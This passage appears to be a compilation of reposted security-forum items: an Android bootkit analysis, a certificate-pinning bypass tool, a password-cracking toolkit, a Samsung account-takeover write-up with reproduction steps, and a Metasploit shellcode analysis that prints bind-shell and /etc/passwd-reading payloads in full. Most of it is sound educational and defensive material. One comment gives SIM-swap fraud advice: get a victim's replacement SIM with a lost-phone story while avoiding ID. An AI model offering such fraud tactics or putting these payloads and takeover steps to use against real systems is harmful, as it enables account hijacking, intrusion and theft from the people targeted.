Note II) contains Samsung's stock system; all normal system applications in it have Samsung's official signature. However, the recovery partition has been replaced by a third-party recovery ROM, and the timestamps of all files in the boot partition are the same (2013-05-08 17:22). Thirdly, based on Qihoo's cloud security technology, we counted the models of all known infected devices. More than half of them are not well-known popular models. 
If the attacker used the second way to infect devices remotely, the attack targets would be random and out of his control, and should be distributed closer to the real market distribution of Android devices. [h=2]Related samples[/h] The APK file extracted by Oldboot uses a self-signed certificate. We found two other malware samples that used the same certificate. The first malware disguises itself as a normal security application. It will dynamically register a ContentObserver to observe any changes to the SMS inbox. Every time a new SMS arrives, it will check whether its content contains words such as "QQ number" or "password" in Chinese (Figure 12). If these words exist, it will delete this SMS, and upload the content to some specified servers. In the past, Tencent provided a service to recover a QQ password through SMS. Thus, this malware could steal a user's QQ account at that time. The malware also uses receivers and a service with the same names as in Oldboot's APK file. Figure 12 The Oldboot-related sample will steal QQ passwords The second related malware was named GoogleDalvik. Its code structures, including JNI interfaces and entry classes, are almost the same as Oldboot's. The only difference between GoogleDalvik and GoogleKernel.apk is that the former doesn't communicate with the imei_chk through the socket. To install or uninstall system applications, it just executes commands in its Java code (Figure 13). Figure 13 The only difference between Oldboot and its previous version We believe GoogleDalvik is an earlier version of Oldboot, a version without the bootkit component. GoogleDalvik and Oldboot both use domains such as androld666.com and androld999.com as their C&C servers' URLs; this is the main reason we named this family Oldboot. [h=2]Solutions[/h] Now, we've released the first special security tool for Oldboot. 
You can download it from: http://msoftdl.360.cn/mobilesafe/shouji360/360safesis/OldbootKiller_20140117.apk This tool will deeply and precisely scan Android devices to find the existence of Oldboot and its variants. We've developed a new defense method in it which can effectively disable all malicious behaviors of Oldboot. Besides using our security tool to detect and disable it, we also suggest that users: Check this tool for updates regularly. We may add more abilities to detect or clean further variants. If it finds Oldboot on your phone, please report your phone's information and the samples to us. This will help us a lot. You can also try to re-flash your device with its original stock ROM. After flashing, Oldboot should be completely removed. Since only modified devices are infected by Oldboot, if you've found it with our tool, you can also directly contact your reseller for customer service. We also suggest you install the 360 Mobile Security application and use its cloud detection ability to protect your mobile phone and tablet. [h=2]Discussion[/h] Before we found Oldboot, the most famous Android malware widely considered a rootkit was a variant of the DroidKungfu family. It gains root permission through system vulnerabilities, remounts the system partition, replaces some executable files in it, and rewrites system configuration files. It also tries to run malicious code in the early stage of the system's booting to prevent being cleaned by antivirus applications. However, there are many differences between DroidKungfu and Oldboot. Firstly, Oldboot's infection method isn't simply remounting the system partition and changing files like DroidKungfu, but physically operating on the device's disk (through flashing or dd). Secondly, Oldboot can't be removed or repaired at the file system level, but DroidKungfu can be. 
At last, this attack method, which exploits the boot partition's RAM disk feature, can easily be developed to implement more advanced file-system-level hiding. We believe Oldboot creates a totally new malware attack method on Android. Through physical access or disk-level operations, future Android malware can similarly write itself to the boot partition and modify the init.rc script to gain very early launch priority with high running permission, to avoid being cleaned by antivirus solutions as well as to effectively hide itself. As the first bootkit found on Android, Oldboot has symbolic significance. We will closely follow further developments of this kind of attack. —— (media contacts: xiaozihang@360.cn) Sursa: Oldboot: the first bootkit on Android | 360????
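The world-writable socket property called out in the analysis above (access mode 666 on the imei_chk socket device) is the crux of the local privilege problem; a minimal sketch of the permission check, with illustrative mode values:

```python
import stat

# Why mode 666 on the imei_chk socket device is dangerous: 0o666 grants
# read/write to owner, group, AND others, so any local app can write
# commands to the root-privileged service listening behind the socket.
def world_writable(mode: int) -> bool:
    return bool(mode & stat.S_IWOTH)  # S_IWOTH = write permission for "others"

print(world_writable(0o666))  # True: any process may send commands
print(world_writable(0o600))  # False: only the owner may write
```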
  14. [h=1]iOS SSL Kill Switch[/h] Blackbox tool to disable SSL certificate validation - including certificate pinning - within iOS Apps. [h=2]Description[/h] Once installed on a jailbroken device, iOS SSL Kill Switch patches low-level SSL functions within the Secure Transport API, including SSLSetSessionOption() and SSLHandshake() in order to override and disable the system's default certificate validation as well as any kind of custom certificate validation (such as certificate pinning). It was successfully tested against the Twitter, Facebook, Square and Apple App Store apps; all of them implement certificate pinning. iOS SSL Kill Switch was initially released at Black Hat Vegas 2012. For more technical details on how it works, see iOS SSL Kill Switch v0.5 Released | In Security [h=2]Installation[/h] Users should first download the latest pre-compiled Debian package available in the release section of the project page at: https://github.com/iSECPartners/ios-ssl-kill-switch/releases The tool was tested on iOS7 running on an iPhone 5S. [h=3]Dependencies[/h] iOS SSL Kill Switch will only run on a jailbroken device. Using Cydia, make sure the following packages are installed: dpkg MobileSubstrate PreferenceLoader Sursa: https://github.com/iSECPartners/ios-ssl-kill-switch
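For comparison, the effect the tool produces on iOS, TLS connections that skip certificate validation entirely, can be sketched with Python's standard ssl module. This is an analogue for testing setups only, not the tool's own Substrate-based mechanism, and such a context should never be used outside test infrastructure:

```python
import ssl

# Build a TLS context that, like a pinning-bypassed app, accepts any
# certificate: hostname checking off and chain verification disabled.
ctx = ssl.create_default_context()
ctx.check_hostname = False          # must be disabled before CERT_NONE
ctx.verify_mode = ssl.CERT_NONE     # no certificate validation at all

print(ctx.verify_mode == ssl.CERT_NONE)  # True: validation is off
```

This is exactly the state an intercepting proxy needs the client to be in so that its self-signed certificates are accepted during app testing.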
15. Boot-Repair-Disk, the 'must-have' rescue CD ! Here is THE rescue disk that you should keep close to your computer ! automatically runs the Boot-Repair rescue tool at start-up also contains the OS-Uninstaller tool. repairs recent (UEFI) computers as well as old PCs HOW TO GET AND USE THE DISK: (1) DOWNLOAD BOOT-REPAIR-DISK, (2) Then burn it to a CD or put it on a USB key via Unetbootin, (3) Insert the Boot-Repair-Disk and reboot the PC, (4) Choose your language, (5) Connect to the internet if possible (6) Click "Recommended repair" (7) Reboot the PC --> solves the majority of bootsector/GRUB/MBR problems GET HELP: by Email (boot.repair ATT gmail DOT com) HELP THE PROJECT: Translate, or Donate (Paypal account boot.repair@gmail.com) Sursa: boot-repair-disk / Home / Home
16. Yes, that's exactly what I was thinking when my SIM card broke. To make it look more "real", you can take an Orange SIM, scratch it so it no longer works, and ask them to replace it. But I think the better option is the lost-phone story, because in that case "someone else could have used the SIM in the meantime". PS: Don't rely on this. At least at Orange, when they replace your SIM, the scumbags FORCE you to sign up for a 3-month (or longer) subscription, and you need an ID card for that. In other words, if the real owner comes in and complains, they might find out who did this to them. Try to get away without showing ID and give some fictitious data. Mind you, with that "fictitious" data I think you could end up committing document forgery and face legal problems, so consider whether it's worth it.
17. Rapid Object Detection in .NET By Huseyin Atasoy, 25 Jan 2014 Introduction The most popular and fastest implementation of the Viola-Jones object detection algorithm is undoubtedly the one in OpenCV. But OpenCV requires wrapper classes to be usable with .NET languages, and Bitmap objects of .NET have to be converted to IplImage format before they are used with OpenCV. On the other hand, programs that use OpenCV are dependent on all OpenCV libraries and their wrappers. These are not problems when functions of OpenCV are used. But if we only need to detect objects on a Bitmap, it isn't worth making our programs dependent on all OpenCV libraries and wrappers... I have written a library (HaarCascadeClassifier.dll) that makes object detection possible in .NET without any other library requirement. It is an open source project that contains an implementation of the Viola-Jones object detection algorithm. The library uses haar cascades generated by OpenCV (XML files) to detect particular objects such as faces. It can be used for object detection purposes or just to understand the algorithm and how parameters affect the result or the speed. Background In fact, my purpose is to share HaarCascadeClassifier.dll and its usage. So I will try to summarize the algorithm. The algorithm of Viola and Jones doesn't use pixels directly to detect objects. It uses rectangular features that are called "haar-like features". These features can be represented using 2, 3, or 4 rectangles. Articol: http://www.codeproject.com/Articles/436521/Rapid-Object-Detection-in-NET
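What makes those rectangular features fast to evaluate is the integral image (summed-area table): once it is built, the pixel sum of any rectangle costs four lookups regardless of its size. A minimal pure-Python sketch of the idea, for illustration only (real implementations such as OpenCV's are heavily optimized):

```python
# Integral image: ii[y][x] holds the sum of all pixels above and to the
# left of (x, y). Built in one pass with a standard recurrence.
def integral_image(img):
    h, w = len(img), len(img[0])
    ii = [[0] * (w + 1) for _ in range(h + 1)]
    for y in range(h):
        for x in range(w):
            ii[y+1][x+1] = img[y][x] + ii[y][x+1] + ii[y+1][x] - ii[y][x]
    return ii

# Sum of the w*h rectangle whose top-left corner is (x, y):
# four lookups, independent of the rectangle's size.
def rect_sum(ii, x, y, w, h):
    return ii[y+h][x+w] - ii[y][x+w] - ii[y+h][x] + ii[y][x]

img = [[1, 2],
       [3, 4]]
ii = integral_image(img)
print(rect_sum(ii, 0, 0, 2, 2))  # 10: sum of all four pixels
```

A two-rectangle haar-like feature is then just `rect_sum` of one region minus `rect_sum` of the adjacent one, which is why the cascade can evaluate thousands of features per window in real time.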
18. [h=3]Today’s outage for several Google services[/h]Earlier today, most Google users who use logged-in services like Gmail, Google+, Calendar and Documents found they were unable to access those services for approximately 25 minutes. For about 10 percent of users, the problem persisted for as much as 30 minutes longer. Whether the effect was brief or lasted the better part of an hour, please accept our apologies—we strive to make all of Google’s services available and fast for you, all the time, and we missed the mark today. The issue has been resolved, and we’re now focused on correcting the bug that caused the outage, as well as putting more checks and monitors in place to ensure that this kind of problem doesn’t happen again. If you’re interested in the technical explanation for what occurred and how it was fixed, read on. At 10:55 a.m. PST this morning, an internal system that generates configurations—essentially, information that tells other systems how to behave—encountered a software bug and generated an incorrect configuration. The incorrect configuration was sent to live services over the next 15 minutes, caused users’ requests for their data to be ignored, and those services, in turn, generated errors. Users began seeing these errors on affected services at 11:02 a.m., and at that time our internal monitoring alerted Google’s Site Reliability Team. Engineers were still debugging 12 minutes later when the same system, having automatically cleared the original error, generated a new correct configuration at 11:14 a.m. and began sending it; errors subsided rapidly starting at this time. By 11:30 a.m. the correct configuration was live everywhere and almost all users’ service was restored. With services once again working normally, our work is now focused on (a) removing the source of failure that caused today’s outage, and (b) speeding up recovery when a problem does occur. We'll be taking the following steps in the next few days: 1. 
Correcting the bug in the configuration generator to prevent recurrence, and auditing all other critical configuration generation systems to ensure they do not contain a similar bug. 2. Adding additional input validation checks for configurations, so that a bad configuration generated in the future will not result in service disruption. 3. Adding additional targeted monitoring to more quickly detect and diagnose the cause of service failure. Posted by Ben Treynor, VP Engineering Sursa: Official Blog: Today’s outage for several Google services
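Step 2 above, validating a generated configuration before it reaches live services, can be sketched in a few lines. The field names and rules here are hypothetical, purely to illustrate the pattern of rejecting a bad config at the generator's output rather than letting serving systems discover it:

```python
# Gate a generated configuration behind sanity checks before pushing it.
# Field names ("service", "version", "backends") are hypothetical.
def validate_config(cfg: dict) -> bool:
    required = {"service", "version", "backends"}
    if not required.issubset(cfg):
        return False
    # An empty backend list would cause every request to be dropped,
    # which is the kind of silent failure validation should catch.
    return len(cfg["backends"]) > 0

good = {"service": "mail", "version": 2, "backends": ["10.0.0.1"]}
bad = {"service": "mail", "version": 2, "backends": []}
print(validate_config(good), validate_config(bad))  # True False
```

The design point is that the check runs at generation time: a config that fails validation is never sent, so a generator bug degrades into a stale-but-working config instead of a global outage.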
19. [h=1]Compiling C# Code at Runtime[/h]By Lumír L? Kojecký, 25 Jan 2014 [h=2]Introduction[/h] Sometimes, it is very useful to compile code at runtime. Personally, I use this feature mostly in these two cases: Simple web tutorials – writing a small piece of code into a TextBox control and executing it, instead of the necessity to own or run some IDE. User-defined functions – I have written an application for symbolic regression with a simple configuration file where the user can choose some of my predefined functions (sin, cos, etc.). The user can also simply write his own mathematical expression with basic knowledge of the C# language. If you want to use this feature, you don’t have to install any third-party libraries. All functionality is provided by the .NET Framework in the Microsoft.CSharp and System.CodeDom.Compiler namespaces. Articol: http://www.codeproject.com/Tips/715891/Compiling-Csharp-Code-at-Runtime
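The same idea, turning a user-supplied expression string into executable code at runtime, can be sketched in Python as an analogue (the article itself uses the .NET CodeDOM APIs; this is only an illustration of the user-defined-function use case it describes):

```python
import math

# Compile a user-defined math expression once, then evaluate it many
# times, as with the symbolic-regression config file described above.
expr = "math.sin(x) + x ** 2"  # hypothetical user input
code = compile(expr, "<user-expr>", "eval")

def f(x):
    # Restrict the evaluation namespace to exactly what the expression needs.
    return eval(code, {"math": math, "x": x})

print(f(0.0))  # 0.0
```

Compiling once and reusing the code object is the payoff in both worlds: the parse cost is paid a single time, and each subsequent call is just execution.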
20. Samsung.com Account Takeover Vulnerability Write-up First of all let me say this: Hurray! They fixed it! After contacting Samsung multiple times I thought they’d completely blown me off in fixing this bug but it looks patched (hopefully!). EDIT: Samsung contacted me and said thanks for the report of the vulnerability. They seemed sincerely interested in fixing the problem – quite the opposite of my initial impression of them (their initial impression of me must’ve been odd considering I’m pretty sick with a cold at the time of this writing). The Vulnerability All Samsung.com accounts can be taken over due to an issue with character removal after authentication. When you register at New URL you can add extra spaces to the end of your account name and it will be registered as a separate account altogether. Alone this is not a big issue (other than perhaps spamming an email address by making multiple accounts with additional spaces after them). However, upon navigating to a Samsung subdomain such as Samsung US | TVs - Tablets - Smartphones - Cameras - Laptops - Refrigerators these trailing spaces are scrubbed from your username. Once this happens and you navigate back to Samsung.com you are authenticated as just a regular email address without any trailing spaces – effectively taking over your target’s account. So if your username was originally “admin@samsung.com<SPACE><SPACE>”, after visiting Samsung US | TVs - Tablets - Smartphones - Cameras - Laptops - Refrigerators it would be scrubbed to “admin@samsung.com”. Apparently scrubbing isn’t always a good thing (the security puns don’t get worse than that!) More detailed instructions (Now patched, at least for shop.us.samsung.com): 1. Register an account at Samsung.com with the email address of a target, use Tamper Data or another HTTP intercept tool and add trailing spaces to the username. 2. Complete the account registration process 3. 
Navigate to “shop.us.samsung.com”, ex: http://shop.us.samsung.com/store?Action=DisplayCustomerServiceOrderSearchPage&Locale-en_US&SiteID=samsung 4. Navigate back to the main Samsung.com domain, ex: Galaxy Note 10.1- 2014 Edition 5. Proceed to attempt to add items to your cart and go to checkout page 6. Notice the account details and cards on file are those of your target Sadly because this isn’t a Samsung TV there is no bug bounty for this exploit, but oh well. Proof of Concept Video Sursa: Samsung.com Account Takeover Vulnerability Write-up | The Hacker Blog
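The bug class above, registration and authentication normalizing usernames differently, can be reduced to a few lines. Everything here (names, the in-memory account store) is illustrative, not Samsung's actual code:

```python
# Registration treats "victim@example.com  " (trailing spaces) as a new
# account, but a subdomain later strips the spaces, so the attacker's
# session resolves to the victim's account.
accounts = {"victim@example.com": "victim-data"}

def register(username):
    # No normalization at registration time: the bug's first half.
    accounts.setdefault(username, "attacker-data")

def subdomain_scrub(username):
    # The inconsistent normalization step on the subdomain.
    return username.strip()

register("victim@example.com  ")                     # attacker signs up
session_user = subdomain_scrub("victim@example.com  ")  # spaces scrubbed
print(accounts[session_user])  # victim-data: the takeover in miniature
```

The fix is the usual one for this class: normalize identifiers once, at a single choke point, before both registration and every authentication check.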
21. [h=2]PACK – Password Analysis & Cracking Kit[/h] PACK (Password Analysis and Cracking Toolkit) is a collection of utilities developed to aid in the analysis of password lists in order to enhance password cracking through pattern detection of masks, rules, character-sets and other password characteristics. The toolkit generates valid input files for the Hashcat family of password crackers. Before using PACK, you must establish selection criteria for password lists. Since we are looking to analyze the way people create their passwords, we must obtain as large a sample of leaked passwords as possible. One such excellent list is based on the RockYou.com compromise. This list provides a collection large and diverse enough to give good results for common passwords used by similar sites (e.g. social networking). The analysis obtained from this list may not work for organizations with specific password policies. As such, the selected sample input should be as close to your target as possible. In addition, try to avoid obtaining lists based on already-cracked passwords, as they will generate a statistical bias toward the rules and masks used by the individual(s) cracking the list and not the actual users. Please note this tool does not, and is not created to, crack passwords – it just aids the analysis of password sets so you can focus your cracking more accurately/efficiently/effectively. You can download PACK here: PACK-0.0.4.tar.gz Or read more here. Sursa: PACK - Password Analysis & Cracking Kit - Darknet - The Darkside
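The core of the mask analysis described above can be sketched simply: reduce each password to a hashcat-style mask (`?l` lowercase, `?u` uppercase, `?d` digit, `?s` symbol), then rank the masks by frequency. A minimal sketch of the first step (PACK's own implementation handles far more, such as charset and rule statistics):

```python
# Map each character class to its hashcat mask token.
def to_mask(password: str) -> str:
    out = []
    for ch in password:
        if ch.islower():
            out.append("?l")
        elif ch.isupper():
            out.append("?u")
        elif ch.isdigit():
            out.append("?d")
        else:
            out.append("?s")
    return "".join(out)

print(to_mask("Password1!"))  # ?u?l?l?l?l?l?l?l?d?s
```

Counting how often each mask occurs across a large leak is what lets a mask attack try the most common structures (capital letter, lowercase run, digit, symbol) before anything exotic.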
22. MARD: A Framework for Metamorphic Malware Analysis and Real-Time Detection Shahid Alam Department of Computer Science University of Victoria, BC, V8P5C2 E-mail: salam@cs.uvic.ca November 11, 2013 Introduction and Motivation End point security is often the last defense against a security threat. An end point can be a desktop, a server, a laptop, a kiosk or a mobile device that connects to a network (Internet). Recent statistics by the ITU (International Telecommunications Union) [40] show that the number of Internet users (i.e. people connecting to the Internet using these end points) in the world has increased from 20% in 2006 to 35% (almost 2 billion in total) in 2011. A study carried out by Symantec about the impacts of cybercrime reports that worldwide losses due to malware attacks and phishing between July 2011 and July 2012 were $110 billion [26]. According to the 2011 Symantec Internet security threat report [25] there was an 81% increase in malware attacks over 2010, and 403 million new malware were created, a 41% increase over 2010. In 2012 there was a 42% increase in malware attacks over 2011. Web-based attacks increased by 30 percent in 2012. With these increases and the anticipated future increases, these end points pose a new security challenge [56] to the security professionals and researchers in industry and in academia, to devise new methods and techniques for malware detection and protection. There are numerous definitions in the literature of malware, also called malicious code, which includes viruses, worms, spywares and trojans. Here I am going to use one of the earliest definitions, by Gary McGraw and Greg Morrisett [49]: Malicious code is any code added, changed, or removed from a software system in order to intentionally cause harm or subvert the intended function of the system. A malware carries out activities such as: setting up a back door for a bot, setting up a keyboard logger, stealing personal information, etc. 
Antimalware software detects and neutralizes the effects of malware. There are two basic detection techniques [39]: anomaly-based and signature-based. The anomaly-based detection technique uses the knowledge of the behavior of a normal program to decide if the program under inspection is malicious or not. The signature-based detection technique uses the characteristics of a malicious program to decide if the program under inspection is malicious or not. Each of the techniques can be performed statically (before the program executes), dynamically (during or after the program execution) or both statically and dynamically (hybrid). Download: http://webhome.cs.uvic.ca/~salam/PhD/TR-MARD.pdf
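The two detection techniques just defined can be contrasted in a toy sketch. The signature bytes and the "normal" syscall-rate profile below are hypothetical, chosen only to show the shape of each approach:

```python
# Signature-based: scan for known-bad byte patterns.
SIGNATURES = [b"\xeb\xfe\x90\x90"]  # hypothetical known-malware pattern

def signature_scan(data: bytes) -> bool:
    return any(sig in data for sig in SIGNATURES)

# Anomaly-based: flag behavior far outside a learned "normal" profile.
# Here the profile is a mean syscall rate with a tolerance band.
def anomaly_check(syscalls_per_sec: float,
                  normal_mean: float = 50.0,
                  band: float = 30.0) -> bool:
    return abs(syscalls_per_sec - normal_mean) > band

print(signature_scan(b"\x00\xeb\xfe\x90\x90\x00"))  # True: signature hit
print(anomaly_check(500.0))                         # True: far outside normal
```

The trade-off the paper builds on is visible even here: the signature scan misses anything not in `SIGNATURES` (e.g. a metamorphic rewrite of the same code), while the anomaly check catches novel behavior but can false-positive on unusual-yet-benign programs.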
23. Assignment five is about analyzing three different shellcodes, created with msfpayload for Linux/x86. linux/x86/exec I chose the linux/x86/exec shellcode as the first example. With: $ msfpayload linux/x86/exec cmd="ls" R | ndisasm -u - it is possible to disassemble the shellcode: 00000000 6A0B push byte +0xb 00000002 58 pop eax 00000003 99 cdq 00000004 52 push edx 00000005 66682D63 push word 0x632d 00000009 89E7 mov edi,esp 0000000B 682F736800 push dword 0x68732f 00000010 682F62696E push dword 0x6e69622f 00000015 89E3 mov ebx,esp 00000017 52 push edx 00000018 E803000000 call dword 0x20 0000001D 6C insb 0000001E 7300 jnc 0x20 00000020 57 push edi 00000021 53 push ebx 00000022 89E1 mov ecx,esp 00000024 CD80 int 0x80 I will now comment on the relevant lines of the shellcode. 00000000 6A0B push byte +0xb 00000002 58 pop eax EAX is set to 0xb = 11. This is the number for execve: $ grep 11 /usr/include/i386-linux-gnu/asm/unistd_32.h #define __NR_execve 11 ... SNIP ... 00000003 99 cdq 00000004 52 push edx Set edx to zero and push it onto the stack for termination. 00000005 66682D63 push word 0x632d This pushes “-c” onto the stack. 00000009 89E7 mov edi,esp Move the stack pointer to EDI. So EDI is pointing to “-c”. 0000000B 682F736800 push dword 0x68732f 00000010 682F62696E push dword 0x6e69622f 00000015 89E3 mov ebx,esp Push /bin/sh onto the stack and move the stack pointer to EBX. EBX is pointing to “/bin/sh”. It can be seen that the ls command is not executed directly. A shell is called with the -c option. From the bash man page: “-c string If the -c option is present, then commands are read from string. If there are arguments after the string, they are assigned to the positional parameters, starting with $0.” 00000017 52 push edx Push some zeros again. 00000018 E803000000 call dword 0x20 This one jumps to 0x20. 
00000020  57          push edi
00000021  53          push ebx
00000022  89E1        mov ecx,esp
00000024  CD80        int 0x80

EDI ("-c") and EBX ("/bin/sh") are pushed onto the stack, ESP is moved into ECX, and the syscall is invoked. Now comes the interesting part: the command "ls" is not visible when debugging with gdb, yet the ls (as hex: 6c 73) is right there in the code:

0000001D  6C          insb
0000001E  7300        jnc 0x20

These two "instructions" are really the data bytes "ls\0". The call at 0x18 pushes the address of the next byte (0x1d) onto the stack as its return address, which is how a pointer to "ls" ends up in the argument list; the debugger just disassembles the bytes as instructions, so it does not show anything being pushed. Libemu can confirm this. For analyzing the shellcode with libemu I use:

$ msfpayload linux/x86/exec cmd="ls" R | sctest -vvv -Ss 100000 -G Exec.dot

The ls command should be executed. The output shows exactly how the execve call is built.

... SNIP ...
[emu 0x0x8f3e088 debug ] Flags:
int execve (
    const char * dateiname = 0x00416fc0 => = "/bin/sh";
    const char * argv[] = [
        = 0x00416fb0 => = 0x00416fc0 => = "/bin/sh";
        = 0x00416fb4 => = 0x00416fc8 => = "-c";
        = 0x00416fb8 => = 0x0041701d => = "ls";
        = 0x00000000 => none;
    ];
    const char * envp[] = 0x00000000 => none;
) = 0;
... SNIP ...

Here it can be seen that the "ls" command is on the stack too. From the Exec.dot file a diagram can be made to illustrate the program execution:

$ dot Exec.dot -Tpng -o Exec.dot.png

That was it for the first shellcode.

linux/x86/shell_bind_tcp

For the second shellcode to analyze I chose linux/x86/shell_bind_tcp.
Disassembling works as follows:

$ msfpayload linux/x86/shell_bind_tcp LPORT=4444 R | ndisasm -u -

00000000  31DB        xor ebx,ebx
00000002  F7E3        mul ebx
00000004  53          push ebx
00000005  43          inc ebx
00000006  53          push ebx
00000007  6A02        push byte +0x2
00000009  89E1        mov ecx,esp
0000000B  B066        mov al,0x66
0000000D  CD80        int 0x80
0000000F  5B          pop ebx
00000010  5E          pop esi
00000011  52          push edx
00000012  680200115C  push dword 0x5c110002
00000017  6A10        push byte +0x10
00000019  51          push ecx
0000001A  50          push eax
0000001B  89E1        mov ecx,esp
0000001D  6A66        push byte +0x66
0000001F  58          pop eax
00000020  CD80        int 0x80
00000022  894104      mov [ecx+0x4],eax
00000025  B304        mov bl,0x4
00000027  B066        mov al,0x66
00000029  CD80        int 0x80
0000002B  43          inc ebx
0000002C  B066        mov al,0x66
0000002E  CD80        int 0x80
00000030  93          xchg eax,ebx
00000031  59          pop ecx
00000032  6A3F        push byte +0x3f
00000034  58          pop eax
00000035  CD80        int 0x80
00000037  49          dec ecx
00000038  79F8        jns 0x32
0000003A  682F2F7368  push dword 0x68732f2f
0000003F  682F62696E  push dword 0x6e69622f
00000044  89E3        mov ebx,esp
00000046  50          push eax
00000047  53          push ebx
00000048  89E1        mov ecx,esp
0000004A  B00B        mov al,0xb
0000004C  CD80        int 0x80

And here is the output from the libemu analysis:

$ msfpayload linux/x86/shell_bind_tcp LPORT=4444 R | sctest -vvv -Ss 100000 -G shell_bind_tcp.dot

... SNIP ...
int socket ( int domain = 2; int type = 1; int protocol = 0; ) = 14;
int bind (
    int sockfd = 14;
    struct sockaddr_in * my_addr = 0x00416fc2 => struct = {
        short sin_family = 2;
        unsigned short sin_port = 23569 (port=4444);
        struct in_addr sin_addr = { unsigned long s_addr = 0 (host=0.0.0.0); };
        char sin_zero = " ";
    };
    int addrlen = 16;
) = 0;
int listen ( int s = 14; int backlog = 0; ) = 0;
int accept ( int sockfd = 14; sockaddr_in * addr = 0x00000000 => none; int addrlen = 0x00000010 => none; ) = 19;
int dup2 ( int oldfd = 19; int newfd = 14; ) = 14;
int dup2 ( int oldfd = 19; int newfd = 13; ) = 13;
int dup2 ( int oldfd = 19; int newfd = 12; ) = 12;
int dup2 ( int oldfd = 19; int newfd = 11; ) = 11;
int dup2 ( int oldfd = 19; int newfd = 10; ) = 10;
int dup2 ( int oldfd = 19; int newfd = 9; ) = 9;
int dup2 ( int oldfd = 19; int newfd = 8; ) = 8;
int dup2 ( int oldfd = 19; int newfd = 7; ) = 7;
int dup2 ( int oldfd = 19; int newfd = 6; ) = 6;
int dup2 ( int oldfd = 19; int newfd = 5; ) = 5;
int dup2 ( int oldfd = 19; int newfd = 4; ) = 4;
int dup2 ( int oldfd = 19; int newfd = 3; ) = 3;
int dup2 ( int oldfd = 19; int newfd = 2; ) = 2;
int dup2 ( int oldfd = 19; int newfd = 1; ) = 1;
int dup2 ( int oldfd = 19; int newfd = 0; ) = 0;
int execve (
    const char * dateiname = 0x00416fb2 => = "/bin//sh";
    const char * argv[] = [
        = 0x00416faa => = 0x00416fb2 => = "/bin//sh";
        = 0x00000000 => none;
    ];
    const char * envp[] = 0x00000000 => none;
) = 0;
... SNIP ...

Now I will analyze the relevant parts of the shellcode, using both the disassembly and the libemu output.

00000000  31DB        xor ebx,ebx
00000002  F7E3        mul ebx
00000004  53          push ebx
00000005  43          inc ebx
00000006  53          push ebx
00000007  6A02        push byte +0x2
00000009  89E1        mov ecx,esp
0000000B  B066        mov al,0x66
0000000D  CD80        int 0x80

First the EBX and EAX registers are zeroed (mul ebx also clears EDX). EBX (0) is pushed onto the stack, then EBX is incremented to one and pushed again, and finally 2 is pushed on top.
After this, the stack address is moved into ECX and EAX is set to 0x66. This is the syscall number (102) for the socketcall function, which is then invoked; in this case the socket() function is executed. The corresponding libemu output:

int socket ( int domain = 2; int type = 1; int protocol = 0; ) = 14;

0000000F  5B          pop ebx
00000010  5E          pop esi
00000011  52          push edx
00000012  680200115C  push dword 0x5c110002
00000017  6A10        push byte +0x10
00000019  51          push ecx
0000001A  50          push eax
0000001B  89E1        mov ecx,esp
0000001D  6A66        push byte +0x66
0000001F  58          pop eax
00000020  CD80        int 0x80

To shorten things a little, this part calls the bind function: again socketcall with EAX = 0x66, but now with EBX = 2 = SYS_BIND (the 2 popped from the stack). This corresponds to the libemu output (the whole output can be seen above):

int bind (
    int sockfd = 14;
    struct sockaddr_in * my_addr = 0x00416fc2 => struct = {
        short sin_family = 2;
        unsigned short sin_port = 23569 (port=4444);
        struct in_addr sin_addr = { unsigned long s_addr = 0 (host=0.0.0.0); };
        char sin_zero = " ";
    };
    int addrlen = 16;
) = 0;

By the way, the 0x5c11 in the pushed dword is port 4444: the port is stored in network byte order, and the bytes 11 5c read big-endian are 0x115c = 4444.

00000022  894104      mov [ecx+0x4],eax
00000025  B304        mov bl,0x4
00000027  B066        mov al,0x66
00000029  CD80        int 0x80

Here EAX = 0x66 and EBX = 4, which selects the listen() function:

$ less /usr/include/linux/net.h | grep 4
#define SYS_LISTEN 4 /* sys_listen(2) */

Here is the libemu output:

int listen ( int s = 14; int backlog = 0; ) = 0;

0000002B  43          inc ebx
0000002C  B066        mov al,0x66
0000002E  CD80        int 0x80

EBX is now 5, which selects the accept function:

int accept ( int sockfd = 14; sockaddr_in * addr = 0x00000000 => none; int addrlen = 0x00000010 => none; ) = 19;

00000030  93          xchg eax,ebx
00000031  59          pop ecx
00000032  6A3F        push byte +0x3f
00000034  58          pop eax
00000035  CD80        int 0x80
00000037  49          dec ecx
00000038  79F8        jns 0x32

EAX = 0x3f = 63, the syscall number for dup2:

$ grep 63 /usr/include/i386-linux-gnu/asm/unistd_32.h
#define __NR_dup2 63

The xchg moves the connection descriptor returned by accept() into EBX, so each dup2(ebx, ecx) duplicates the connection over descriptor ECX. The loop repeats until ECX goes negative, so every file descriptor (including stdin, stdout and stderr) is redirected to the connection.
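The byte order of `push dword 0x5c110002` can be checked the same way as before: interpreted as the start of a struct sockaddr_in, it yields AF_INET and port 4444. A sketch of mine using Python's struct and socket modules:

```python
import socket
import struct

# `push dword 0x5c110002` writes the bytes 02 00 11 5c to the stack;
# these are the first fields of a struct sockaddr_in.
raw = struct.pack("<I", 0x5c110002)
family, port_be = struct.unpack("<H2s", raw)

print(family == socket.AF_INET)           # True: sin_family = 2
print(struct.unpack(">H", port_be)[0])    # 4444: sin_port is big-endian 0x115c
print(socket.ntohs(0x5c11))               # 4444 on a little-endian host
```

This also explains why libemu prints "sin_port = 23569 (port=4444)": 23569 is 0x5c11 read in host (little-endian) order.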
0000003A  682F2F7368  push dword 0x68732f2f
0000003F  682F62696E  push dword 0x6e69622f
00000044  89E3        mov ebx,esp
00000046  50          push eax
00000047  53          push ebx
00000048  89E1        mov ecx,esp
0000004A  B00B        mov al,0xb
0000004C  CD80        int 0x80

Finally we have the execve call. This works pretty much as in the analysis of the linux/x86/exec shellcode.

int execve (
    const char * dateiname = 0x00416fb2 => = "/bin//sh";
    const char * argv[] = [
        = 0x00416faa => = 0x00416fb2 => = "/bin//sh";
        = 0x00000000 => none;
    ];
    const char * envp[] = 0x00000000 => none;
) = 0;

I also used the debugger to analyze the shellcode, but I think its output is of no further help here. And finally the flowchart:

$ dot shell_bind_tcp.dot -Tpng -o shell_bind_tcp.dot.png

So that was it for the second analysis.

linux/x86/read_file

So let us start by disassembling the shellcode:

$ sudo msfpayload linux/x86/read_file PATH="/etc/passwd" R | ndisasm -u -

00000000  EB36        jmp short 0x38
00000002  B805000000  mov eax,0x5
00000007  5B          pop ebx
00000008  31C9        xor ecx,ecx
0000000A  CD80        int 0x80
0000000C  89C3        mov ebx,eax
0000000E  B803000000  mov eax,0x3
00000013  89E7        mov edi,esp
00000015  89F9        mov ecx,edi
00000017  BA00100000  mov edx,0x1000
0000001C  CD80        int 0x80
0000001E  89C2        mov edx,eax
